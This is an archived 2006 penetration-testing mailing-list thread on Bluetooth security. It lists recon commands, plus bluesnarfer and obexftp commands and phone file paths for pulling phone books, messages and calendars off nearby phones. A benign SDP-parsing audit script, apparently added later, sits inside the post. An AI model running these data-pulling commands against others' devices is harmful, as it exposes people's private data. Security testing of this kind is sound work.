Penetration Testing mailing list archives

RE: Bluetooth Pentesting?
From: "Martin Gustafsson" <gustafsson.martin () bredband net>
Date: Tue, 22 Aug 2006 22:27:41 +0200


Hi,

The car stereo trick can be done using carwhisperer (see Trifinites page).

I have not been monitoring bluetooth security for the last year, but here
are some commands you can run. Do not expect to find any major holes on a
new phone though...


COMMANDS:

hcitool info $BD_ADDR 

hcitool name $BD_ADDR 

sdptool browse $BD_ADDR 

sdptool browse --tree $BD_ADDR 

Snarf name and serial
bluesnarfer -i -b $BD_ADDR 

Snarf phone books
bluesnarfer -l -b $BD_ADDR 

Try to FTP files
obexftp -b $BD_ADDR -B $channel -g $file

The FTP channel is labelled "OBEX Object Push" when you run "sdptool browse"

Files I have found to be valid on different phones
telecom/cal.vcs
telecom/cal/###.vcs
telecom/cal/info.log
telecom/devinfo.txt
telecom/folderlisting
telecom/inmsg.vmg
telecom/note.vnt
telecom/outmsg.vmg
telecom/pb.vcf
telecom/pb/###.vcf
telecom/pb/0.vcf
telecom/pb/1.vcf
telecom/pb/info.log
telecom/push.txt
telecom/rtc.txt
telecom/sentmsg.vm
telecom/something.jph

Scan RFCOMM channels
rfcomm_scan $BD_ADDR 

Scan 30 000 PSM ports (takes a LONG time)
psm_scan $BD_ADDR 
SOME LINKS:

Bluesweep:
http://www.airmagnet.com/products/bluesweep.htm

BLUETOOTH SECURITY TOOLS
http://student.vub.ac.be/~sijansse/2e%20lic/BT/Tools/Tools.html

Bluescanner
http://www.networkchemistry.com/products/bluescanner.php

Bluetooth projects
http://www.alighieri.org/project.html

Bluesniping
http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

Bluetooth device security database
http://www.betaversion.net/btdsd/

BTscanner
http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads

Bluetooth advisories and "Greenplaque"
http://www.digitalmunition.com/

Backtrack (bootable pentest distro) has a bunch of bluetooth tools.
http://www.remote-exploit.org/index.php/BackTrack

Bluetooth tools
http://www.securitywireless.info/Downloads-index-req-viewdownload-cid-18.html

Bluetest.pl
http://www.syss.de/links.html

Trifinite tools
http://trifinite.org/trifinite_downloads.html


Regards,
Martin Gustafsson
CISSP
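
The "sdptool browse" output referred to above is what tells you which RFCOMM channel (or L2CAP PSM) each advertised service sits on, so it is the natural input for a fleet inventory. The script below, added here as an example and not code from the original post or from BlueZ, parses that record layout into a list of services, looks up the channel for a named service (e.g. "OBEX Object Push"), and flags service-class UUIDs that an auditor usually wants to see listed per device (the UUID values are Bluetooth SIG assigned numbers; the sample browse output, the device address and the function names are constructed for the example).

```python
"""Parse `sdptool browse` output into a per-device service inventory.

Added example for this thread, not code from the original post or from BlueZ.
It assumes the record layout BlueZ's sdptool prints ("Service Name:",
"Service RecHandle:", indented UUID / "Channel:" / "PSM:" lines).
SAMPLE_BROWSE below is constructed, not captured from a real device.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Bluetooth SIG assigned service-class UUIDs worth listing in an audit report:
# profiles that expose file, phone-book or modem functionality over RFCOMM/OBEX.
PROFILES_OF_INTEREST = {
    0x1101: "Serial Port",
    0x1103: "Dialup Networking",
    0x1105: "OBEX Object Push",
    0x1106: "OBEX File Transfer",
    0x1108: "Headset",
    0x111E: "Handsfree",
}

@dataclass
class SdpService:
    name: str
    handle: str
    class_uuids: List[int] = field(default_factory=list)
    rfcomm_channel: Optional[int] = None
    l2cap_psm: Optional[int] = None

# Constructed sample: two named records on RFCOMM and one unnamed L2CAP-only record.
SAMPLE_BROWSE = """\
Browsing 00:11:22:33:44:55 ...
Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x10002
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100

Service RecHandle: 0x10007
Service Class ID List:
  "Audio Source" (0x110a)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 25
  "AVDTP" (0x0019)
    uint16: 0x0100
"""

_NAME = re.compile(r"^Service Name:\s*(.+)$")
_HANDLE = re.compile(r"^Service RecHandle:\s*(0x[0-9a-fA-F]+)")
_UUID = re.compile(r'^\s+"[^"]*"\s+\((0x[0-9a-fA-F]{4})\)')
_CHANNEL = re.compile(r"^\s+Channel:\s*(\d+)")
_PSM = re.compile(r"^\s+PSM:\s*(\d+)")

def parse_sdp_browse(text: str) -> List[SdpService]:
    """Split sdptool browse output into SdpService records."""
    services: List[SdpService] = []
    current: Optional[SdpService] = None
    section = None  # which "... List:" block we are inside
    for line in text.splitlines():
        m = _NAME.match(line)
        if m:  # a named record always starts with its Service Name line
            current = SdpService(name=m.group(1).strip(), handle="")
            services.append(current)
            section = None
            continue
        m = _HANDLE.match(line)
        if m:
            if current is None or current.handle:
                # a RecHandle with no preceding name = unnamed record
                current = SdpService(name="(unnamed)", handle=m.group(1))
                services.append(current)
            else:
                current.handle = m.group(1)
            section = None
            continue
        if current is None:
            continue
        if line.startswith("Service Class ID List"):
            section = "class"
        elif line.startswith("Protocol Descriptor List"):
            section = "proto"
        elif line.startswith("Profile Descriptor List"):
            section = "profile"
        elif section == "class" and _UUID.match(line):
            current.class_uuids.append(int(_UUID.match(line).group(1), 16))
        elif section == "proto" and _CHANNEL.match(line):
            current.rfcomm_channel = int(_CHANNEL.match(line).group(1))
        elif section == "proto" and _PSM.match(line):
            current.l2cap_psm = int(_PSM.match(line).group(1))
    return services

def channel_for(services: List[SdpService], name: str) -> Optional[int]:
    """RFCOMM channel of the first service with the given name, or None."""
    for svc in services:
        if svc.name == name:
            return svc.rfcomm_channel
    return None

def audit(services: List[SdpService]) -> List[Tuple[str, str, Optional[int]]]:
    """(service name, profile label, RFCOMM channel) for each flagged profile."""
    found = []
    for svc in services:
        for uuid in svc.class_uuids:
            if uuid in PROFILES_OF_INTEREST:
                found.append((svc.name, PROFILES_OF_INTEREST[uuid], svc.rfcomm_channel))
    return found

if __name__ == "__main__":
    for name, label, channel in audit(parse_sdp_browse(SAMPLE_BROWSE)):
        print(f"{label:20s} channel={channel} ({name})")
```

In practice you would feed it the saved output of "sdptool browse $BD_ADDR" for each device you own and diff the flagged list against what the device is supposed to expose; a phone advertising OBEX Object Push or Dialup Networking on a fixed channel is the item to note in the report, since the SDP record itself says nothing about whether pairing is enforced.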


-----Original Message-----
From: Robert D. Holtz [mailto:robert.d.holtz () gmail com] 
Sent: 22 August 2006 02:49
To: steven () lovebug org; pen-test () securityfocus com
Subject: RE: Bluetooth Pentesting?

Here's an interesting article on Blue tooth security:

http://ntrg.cs.tcd.ie/undergrad/4ba2.05/group15/index.html

There was also a story circulating awhile back about the ability to transmit
radio directly into someone's car stereo with a directional antenna.  I'm
sorry that I can't recall the details but I found it amusing that you can
mess with someone by having whatever you want coming out their radio ... not
truly a "real" security issue but amusing none the less.

-----Original Message-----
From: steven () lovebug org [mailto:steven () lovebug org]
Sent: Monday, August 21, 2006 3:06 PM
To: pen-test () securityfocus com
Subject: Bluetooth Pentesting?

Greetings,

Does anyone on this list do bluetooth pentesting?  I have read tons of old
posts and found plenty of tools to do a few different things.  However, I do
not find any of it to be overly useful.  Most of the tools out there seem to
be aimed at certain cell phones or are very specific.  I am trying to find
out what the risks are of all kinds of devices.  I have found btscanner to
be pretty good at detecting devices but it doesn't do too much other than
detect it.  I can scan and pickup 150+ devices and the Vulnerable to:
section is always the same.. blank.  Are all the bluetooth devices I find so
super secure?  I pick up cars, phones, PDAs, computers, keyboards, etc.  Are
there really no risks with these devices?

Is there a better/good tool out there that can really find various bluetooth
devices and tell me what -real- risks might be associated with them -- on
top of that.. is there a good tool for trying to pull data or use these
devices?  Example: a dell or mac laptop has bluetooth on, or a Treo with it
on.. what are the possible risks?  What tools can actually test if
authentication is required for connecting with these devices.. or whether I
can bruteforce it or connect at all?

Any suggestions would be greatly appreciated and I am really trying to do
something more than just "detect" bluetooth devices.  I need to know if
there are risks here.

Thanks


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------

